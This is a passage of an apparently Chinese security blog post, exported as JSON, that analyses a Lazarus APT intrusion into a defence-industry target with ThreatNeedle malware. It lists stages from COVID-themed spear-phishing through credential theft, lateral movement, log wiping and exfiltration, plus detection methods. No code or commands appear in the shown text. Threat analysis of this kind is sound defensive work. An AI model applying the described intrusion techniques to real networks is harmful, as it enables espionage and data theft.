{"id":780,"date":"2021-08-20T17:20:48","date_gmt":"2021-08-20T09:20:48","guid":{"rendered":"http:\/\/weizn.net\/?p=780"},"modified":"2021-08-25T17:18:00","modified_gmt":"2021-08-25T09:18:00","slug":"apt%e6%8a%a5%e5%91%8a%e5%88%86%e6%9e%90%ef%bc%9alazarus%e7%bb%84%e7%bb%87%e9%92%88%e5%af%b9%e5%9b%bd%e9%98%b2%e5%b7%a5%e4%b8%9a%e7%9a%84%e4%b8%80%e6%ac%a1%e6%94%bb%e5%87%bb","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=780","title":{"rendered":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B8%80%E3%80%81%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC\" title=\"\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\">\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%BA%8C%E3%80%81C2%E7%A8%8B%E5%BA%8F%E6%9C%AC%E5%9C%B0%E6%A4%8D%E5%85%A5%E6%B5%81%E7%A8%8B\" title=\"\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b\">\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B8%89%E3%80%81ThreatNeedle%E5%AE%89%E8%A3%85%E5%99%A8%EF%BC%88Installer%EF%BC%89\" title=\"\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09\">\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%9B%9B%E3%80%81ThreatNeedle%E5%8A%A0%E8%BD%BD%E5%99%A8%EF%BC%88loader%EF%BC%89\" title=\"\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09\">\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%BA%94%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8\" title=\"\u4e94\u3001ThreatNeedle\u540e\u95e8\">\u4e94\u3001ThreatNeedle\u540e\u95e8<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%85%AD%E3%80%81%E5%90%8E%E5%88%A9%E7%94%A8%E9%98%B6%E6%AE%B5\" title=\"\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5\">\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B8%83%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\" title=\"\u4e03\u3001\u51ed\u636e\u6536\u96c6\">\u4e03\u3001\u51ed\u636e\u6536\u96c6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%85%AB%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\" title=\"\u516b\u3001\u6a2a\u5411\u79fb\u52a8\">\u516b\u3001\u6a2a\u5411\u79fb\u52a8<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B9%9D%E3%80%81%E7%AA%81%E7%A0%B4%E7%BD%91%E7%BB%9C%E9%9A%94%E7%A6%BB\" title=\"\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb\">\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%8D%81%E3%80%81%E6%95%B0%E6%8D%AE%E6%B8%97%E5%87%BA\" title=\"\u5341\u3001\u6570\u636e\u6e17\u51fa\">\u5341\u3001\u6570\u636e\u6e17\u51fa<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=780\/#%E6%A3%80%E6%B5%8B%E4%B8%8E%E9%98%B2%E5%BE%A1\" title=\"\u68c0\u6d4b\u4e0e\u9632\u5fa1\">\u68c0\u6d4b\u4e0e\u9632\u5fa1<\/a><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/weizn.net\/?p=780\/#1%E3%80%81%E9%82%AE%E4%BB%B6%E6%B2%99%E7%AE%B1%E5%AF%B9%E4%BA%8E%E5%AE%8F%E6%96%87%E6%A1%A3%E7%9A%84%E6%A3%80%E6%B5%8B\" title=\"1\u3001\u90ae\u4ef6\u6c99\u7bb1\u5bf9\u4e8e\u5b8f\u6587\u6863\u7684\u68c0\u6d4b\">1\u3001\u90ae\u4ef6\u6c99\u7bb1\u5bf9\u4e8e\u5b8f\u6587\u6863\u7684\u68c0\u6d4b<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=780\/#2%E3%80%81%E9%92%93%E9%B1%BC%E6%96%87%E6%A1%A3%E5%9C%A8%E5%8F%97%E5%AE%B3%E8%80%85%E7%94%B5%E8%84%91%E4%B8%8A%E6%89%A7%E8%A1%8C%E7%9A%84%E8%A1%8C%E4%B8%BA\" title=\"2\u3001\u9493\u9c7c\u6587\u6863\u5728\u53d7\u5bb3\u8005\u7535\u8111\u4e0a\u6267\u884c\u7684\u884c\u4e3a\">2\u3001\u9493\u9c7c\u6587\u6863\u5728\u53d7\u5bb3\u8005\u7535\u8111\u4e0a\u6267\u884c\u7684\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E5%90%AF%E5%8A%A8%E7%9B%AE%E5%BD%95%E5%88%9B%E5%BB%BA%E6%96%87%E4%BB%B6\" title=\"1\uff09\u542f\u52a8\u76ee\u5f55\u521b\u5efa\u6587\u4ef6\">1\uff09\u542f\u52a8\u76ee\u5f55\u521b\u5efa\u6587\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E5%AD%90%E8%BF%9B%E7%A8%8B%E8%BF%90%E8%A1%8Crundll32\" title=\"2\uff09\u5b50\u8fdb\u7a0b\u8fd0\u884crundll32\">2\uff09\u5b50\u8fdb\u7a0b\u8fd0\u884crundll32<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=780\/#3%E3%80%81ThreatNeedle_Installer%E7%9A%84%E8%A1%8C%E4%B8%BA\" title=\"3\u3001ThreatNeedle Installer\u7684\u884c\u4e3a\">3\u3001ThreatNeedle Installer\u7684\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E6%B3%A8%E5%86%8C%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E5%AE%9E%E7%8E%B0%E6%8C%81%E4%B9%85%E5%8C%96\" title=\"1\uff09\u6ce8\u518c\u7cfb\u7edf\u670d\u52a1\u5b9e\u73b0\u6301\u4e45\u5316\">1\uff09\u6ce8\u518c\u7cfb\u7edf\u670d\u52a1\u5b9e\u73b0\u6301\u4e45\u5316<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E5%86%99%E5%85%A5%E5%88%B0%E6%B3%A8%E5%86%8C%E8%A1%A8\" title=\"2\uff09\u914d\u7f6e\u4fe1\u606f\u5199\u5165\u5230\u6ce8\u518c\u8868\">2\uff09\u914d\u7f6e\u4fe1\u606f\u5199\u5165\u5230\u6ce8\u518c\u8868<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-19\" href=\"http:\/\/weizn.net\/?p=780\/#4%E3%80%81ThreatNeedle_Loader%E7%9A%84%E8%A1%8C%E4%B8%BA\" title=\"4\u3001ThreatNeedle Loader\u7684\u884c\u4e3a\">4\u3001ThreatNeedle Loader\u7684\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-20\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E4%BB%8E%E6%B3%A8%E5%86%8C%E8%A1%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E9%85%8D%E7%BD%AE%E5%B9%B6%E4%B8%94%E8%A7%A3%E5%AF%86\" title=\"1\uff09\u4ece\u6ce8\u518c\u8868\u4e2d\u8bfb\u53d6\u914d\u7f6e\u5e76\u4e14\u89e3\u5bc6\">1\uff09\u4ece\u6ce8\u518c\u8868\u4e2d\u8bfb\u53d6\u914d\u7f6e\u5e76\u4e14\u89e3\u5bc6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-21\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E8%A7%A3%E5%AF%86payload%E5%90%8E%E4%BB%8E%E5%86%85%E5%AD%98%E4%B8%AD%E5%8A%A0%E8%BD%BD\" title=\"2\uff09\u89e3\u5bc6payload\u540e\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d\">2\uff09\u89e3\u5bc6payload\u540e\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-22\" href=\"http:\/\/weizn.net\/?p=780\/#5%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8%E8%A1%8C%E4%B8%BA\" title=\"5\u3001ThreatNeedle\u540e\u95e8\u884c\u4e3a\">5\u3001ThreatNeedle\u540e\u95e8\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-23\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E6%96%87%E4%BB%B6%E6%B5%8F%E8%A7%88%E4%B8%8E%E6%93%8D%E4%BD%9C%EF%BC%8C%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96\" title=\"1\uff09\u6587\u4ef6\u6d4f\u89c8\u4e0e\u64cd\u4f5c\uff0c\u654f\u611f\u6587\u4ef6\u8bfb\u53d6\">1\uff09\u6587\u4ef6\u6d4f\u89c8\u4e0e\u64cd\u4f5c\uff0c\u654f\u611f\u6587\u4ef6\u8bfb\u53d6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-24\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E8%BF%9C%E6%8E%A7%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E8%A1%8C\" title=\"2\uff09\u8fdc\u63a7\u6267\u884c\u547d\u4ee4\u884c\">2\uff09\u8fdc\u63a7\u6267\u884c\u547d\u4ee4\u884c<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-25\" href=\"http:\/\/weizn.net\/?p=780\/#6%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\" title=\"6\u3001\u51ed\u636e\u6536\u96c6\">6\u3001\u51ed\u636e\u6536\u96c6<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-26\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89responder%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E5%B7%A5%E5%85%B7\" title=\"1\uff09responder\u51ed\u636e\u91c7\u96c6\u5de5\u5177\">1\uff09responder\u51ed\u636e\u91c7\u96c6\u5de5\u5177<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-27\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81\" title=\"2\uff09\u5f3a\u5236\u8ba4\u8bc1\">2\uff09\u5f3a\u5236\u8ba4\u8bc1<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-28\" href=\"http:\/\/weizn.net\/?p=780\/#3%EF%BC%89%E5%85%B6%E5%AE%83%E6%9C%AC%E5%9C%B0%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E6%96%B9%E5%BC%8F\" title=\"3\uff09\u5176\u5b83\u672c\u5730\u51ed\u636e\u91c7\u96c6\u65b9\u5f0f\">3\uff09\u5176\u5b83\u672c\u5730\u51ed\u636e\u91c7\u96c6\u65b9\u5f0f<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-29\" href=\"http:\/\/weizn.net\/?p=780\/#7%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\" title=\"7\u3001\u6a2a\u5411\u79fb\u52a8\">7\u3001\u6a2a\u5411\u79fb\u52a8<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-30\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E5%91%BD%E4%BB%A4%E5%88%9B%E5%BB%BAIPC%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93\" title=\"1\uff09\u547d\u4ee4\u521b\u5efaIPC\u547d\u540d\u7ba1\u9053\">1\uff09\u547d\u4ee4\u521b\u5efaIPC\u547d\u540d\u7ba1\u9053<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-31\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89wmi%E5%91%BD%E4%BB%A4%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6\" title=\"2\uff09wmi\u547d\u4ee4\u8fdc\u7a0b\u8c03\u7528\u6076\u610f\u6587\u4ef6\">2\uff09wmi\u547d\u4ee4\u8fdc\u7a0b\u8c03\u7528\u6076\u610f\u6587\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-32\" href=\"http:\/\/weizn.net\/?p=780\/#3%EF%BC%89%E7%99%BB%E5%BD%95%E6%88%90%E5%8A%9F%E5%A4%9A%E5%8F%B0windows_server\" title=\"3\uff09\u767b\u5f55\u6210\u529f\u591a\u53f0windows server\">3\uff09\u767b\u5f55\u6210\u529f\u591a\u53f0windows server<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-33\" href=\"http:\/\/weizn.net\/?p=780\/#8%E3%80%81%E6%8E%A7%E5%88%B6%E4%BA%86IT%E7%AE%A1%E7%90%86%E5%91%98%E7%9A%84%E6%9C%BA%E5%99%A8%EF%BC%8Cdump%E6%B5%8F%E8%A7%88%E5%99%A8%E5%87%AD%E6%8D%AE\" title=\"8\u3001\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u6d4f\u89c8\u5668\u51ed\u636e\">8\u3001\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u6d4f\u89c8\u5668\u51ed\u636e<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-34\" href=\"http:\/\/weizn.net\/?p=780\/#9%E3%80%81%E5%9C%A8%E5%91%98%E5%B7%A5%E7%94%B5%E8%84%91%E4%B8%8A%E4%BD%BF%E7%94%A8PuTTyPSCP%E5%B7%A5%E5%85%B7%E4%B8%8A%E4%BC%A0%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%B0server\" title=\"9\u3001\u5728\u5458\u5de5\u7535\u8111\u4e0a\u4f7f\u7528PuTTyPSCP\u5de5\u5177\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230server\">9\u3001\u5728\u5458\u5de5\u7535\u8111\u4e0a\u4f7f\u7528PuTTyPSCP\u5de5\u5177\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230server<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-35\" href=\"http:\/\/weizn.net\/?p=780\/#10%E3%80%81NMAP%E6%89%AB%E6%8F%8F%E4%BA%86%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E4%B8%AD%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%BC%80%E6%94%BE%E7%AB%AF%E5%8F%A3\" title=\"10\u3001NMAP\u626b\u63cf\u4e86\u9694\u79bb\u7f51\u6bb5\u4e2d\u7cfb\u7edf\u7684\u5f00\u653e\u7aef\u53e3\">10\u3001NMAP\u626b\u63cf\u4e86\u9694\u79bb\u7f51\u6bb5\u4e2d\u7cfb\u7edf\u7684\u5f00\u653e\u7aef\u53e3<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-36\" href=\"http:\/\/weizn.net\/?p=780\/#11%E3%80%81linux%E4%B8%8A%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%E6%9F%A5%E7%9C%8B%EF%BC%8C%E4%BB%A5%E5%8F%8A%E9%80%9A%E8%BF%87rm%E5%91%BD%E4%BB%A4%E6%B8%85%E9%99%A4\" title=\"11\u3001linux\u4e0a\u65e5\u5fd7\u6587\u4ef6\u67e5\u770b\uff0c\u4ee5\u53ca\u901a\u8fc7rm\u547d\u4ee4\u6e05\u9664\">11\u3001linux\u4e0a\u65e5\u5fd7\u6587\u4ef6\u67e5\u770b\uff0c\u4ee5\u53ca\u901a\u8fc7rm\u547d\u4ee4\u6e05\u9664<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-37\" href=\"http:\/\/weizn.net\/?p=780\/#12%E3%80%81%E4%BD%BF%E7%94%A8logrotate%E5%B7%A5%E5%85%B7%E6%B8%85%E9%99%A4linux%E6%97%A5%E5%BF%97\" title=\"12\u3001\u4f7f\u7528logrotate\u5de5\u5177\u6e05\u9664linux\u65e5\u5fd7\">12\u3001\u4f7f\u7528logrotate\u5de5\u5177\u6e05\u9664linux\u65e5\u5fd7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-38\" href=\"http:\/\/weizn.net\/?p=780\/#13%E3%80%81http%E4%BB%A3%E7%90%86%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E7%AA%81%E7%A0%B4%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\" title=\"13\u3001http\u4ee3\u7406\u7684\u4f7f\u7528\uff0c\u7a81\u7834\u9694\u79bb\u7f51\u6bb5\u6e17\u51fa\u6570\u636e\">13\u3001http\u4ee3\u7406\u7684\u4f7f\u7528\uff0c\u7a81\u7834\u9694\u79bb\u7f51\u6bb5\u6e17\u51fa\u6570\u636e<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-39\" href=\"http:\/\/weizn.net\/?p=780\/#14%E3%80%81%E5%9C%A8%E8%A2%AB%E6%8E%A7server%E4%B8%8A%E9%80%9A%E8%BF%87ssh%E5%88%9B%E5%BB%BA%E5%88%B0%E5%A4%96%E7%BD%91%E7%9A%84ssh%E9%9A%A7%E9%81%93\" title=\"14\u3001\u5728\u88ab\u63a7server\u4e0a\u901a\u8fc7ssh\u521b\u5efa\u5230\u5916\u7f51\u7684ssh\u96a7\u9053\">14\u3001\u5728\u88ab\u63a7server\u4e0a\u901a\u8fc7ssh\u521b\u5efa\u5230\u5916\u7f51\u7684ssh\u96a7\u9053<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-40\" href=\"http:\/\/weizn.net\/?p=780\/#15%E3%80%81PuTTyPSCP%E5%B7%A5%E5%85%B7%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\" title=\"15\u3001PuTTyPSCP\u5de5\u5177\u6e17\u51fa\u6570\u636e\">15\u3001PuTTyPSCP\u5de5\u5177\u6e17\u51fa\u6570\u636e<\/a><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<p>Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u539f\u59cb\u62a5\u544a\uff1a<a href=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarus-targets-defense-industry-with-threatneedle.pdf\">lazarus-targets-defense-industry-with-threatneedle<\/a><\/p>\n<blockquote><p>\u672c\u6b21\u62a5\u544a\u7591\u4f3c\u662f\u9488\u5bf9\u4fc4\u7f57\u65af\u67d0\u673a\u6784\u7684\u4e00\u6b21\u653b\u51fb\u884c\u52a8\uff0c\u76ee\u7684\u83b7\u53d6\u77e5\u8bc6\u4ea7\u6743\u76f8\u5173\u6570\u636e\uff0c\u672c\u6587\u4f1a\u89e3\u8bfb\u653b\u51fb\u8005\u884c\u52a8\u8fc7\u7a0b\uff0c\u5e76\u7814\u7a76\u90e8\u5206\u73af\u8282\u7684\u68c0\u6d4b\u65b9\u5f0f\u3002<\/p><\/blockquote>\n<p>\u8be5\u7ec4\u7ec7\u5728\u5176\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\u90ae\u4ef6\u4e2d\u4f7f\u7528\u4e86COVID-19\u4e3b\u9898\uff0c\u901a\u8fc7\u516c\u5f00\u4fe1\u606f\u6536\u96c6\u76ee\u6807\u7684\u5de5\u4f5c\u4eba\u5458\uff0c\u901a\u8fc7\u9493\u9c7c\u83b7\u53d6\u521d\u6b65\u7acb\u8db3\u70b9\uff0c\u7136\u540e\u6536\u96c6\u51ed\u636e\u5e76\u6a2a\u5411\u79fb\u52a8\uff0c\u5e76\u5bfb\u627e\u76ee\u6807\u73af\u5883\u4e2d\u7684\u5173\u952e\u8d44\u4ea7\u3002\u5185\u7f51\u4e2d\u901a\u8fc7\u63a7\u5236\u8fb9\u754c\u8def\u7531\u5668\u5e76\u914d\u7f6e\u4ee3\u7406\uff0c\u7ed5\u8fc7\u4e86\u5185\u7f51\u7684\u7f51\u7edc\u9694\u79bb\u7b56\u7565\uff0c\u4ece\u800c\u4f7f\u4ed6\u4eec\u80fd\u591f\u5c06\u7a83\u53d6\u7684\u6570\u636e\u4ece\u9694\u79bb\u7f51\u7edc\u4f20\u8f93\u5230C2\u670d\u52a1\u5668\u4e0a\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-QyPFRTTS\"><span class=\"ez-toc-section\" id=\"%E4%B8%80%E3%80%81%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC\"><\/span>\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p data-diff-id=\"ct-diff-id-V5ZXn8hi\">\u9c7c\u53c9\u5f0f\u7684\u7f51\u7edc\u9493\u9c7c\u88ab\u7528\u4e8e\u6076\u610f\u7a0b\u5e8f\u7684\u8f7d\u4f53\uff0c\u5728\u53d1\u52a8\u653b\u51fb\u4e4b\u524d\uff0cAPT\u7ec4\u7ec7\u7814\u7a76\u4e86\u5173\u4e8e\u76ee\u6807\u7ec4\u7ec7\u7684\u516c\u5f00\u4fe1\u606f\uff0c\u5e76\u786e\u5b9a\u4e86\u5c5e\u4e8e\u8be5\u516c\u53f8\u5404\u90e8\u95e8\u7684\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u53d1\u9001\u7684\u9493\u9c7c\u90ae\u4ef6\u8981\u4e48\u9644\u6709\u4e00\u4e2a\u6076\u610f\u7684Word\u6587\u6863\uff0c\u8981\u4e48\u6709\u4e00\u4e2a\u6076\u610fWord\u4e0b\u8f7d\u94fe\u63a5\u3002 \u8fd9\u4e9b\u9493\u9c7c\u90ae\u4ef6\u4f2a\u9020\u6210\u662f\u533b\u7597\u4e2d\u5fc3\u64b0\u5199\uff0c\u5185\u5bb9\u662f\u5173\u4e8e\u5f53\u4eca\u6700\u70ed\u95e8\u7684\u8bdd\u9898&#8211;COVID-19\u75c5\u6bd2\u611f\u67d3\u7684\u7d27\u6025\u901a\u77e5\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-795\" title=\"0a5c6ff4a911159517dda27795d5ef89-10\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10.png\" alt=\"0a5c6ff4a911159517dda27795d5ef89-10\" width=\"610\" height=\"395\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10.png 1262w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10-768x498.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10-1170x758.png 1170w, 